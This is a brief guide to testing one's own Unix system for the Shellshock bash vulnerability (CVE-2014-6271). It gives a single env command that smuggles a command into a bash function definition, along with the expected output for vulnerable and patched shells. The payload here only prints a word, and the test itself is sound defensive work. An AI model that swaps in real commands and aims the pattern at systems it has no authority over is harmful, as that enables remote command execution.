Testing Shellshock Bug In BASH – CVE-2014-6271 (Exploit 1)
To test for the vulnerability on your *nix systems just issue the following command as any user (doesn’t have to be root):
env testbug='() { :;}; echo VULNERABLE' bash -c "echo completed"
If you see this:
VULNERABLE completed
It’s vulnerable, if it’s fixed or not vulnerable you should see this:
bash: warning: testbug: ignoring function definition attempt bash: error importing function definition for `testbug' completed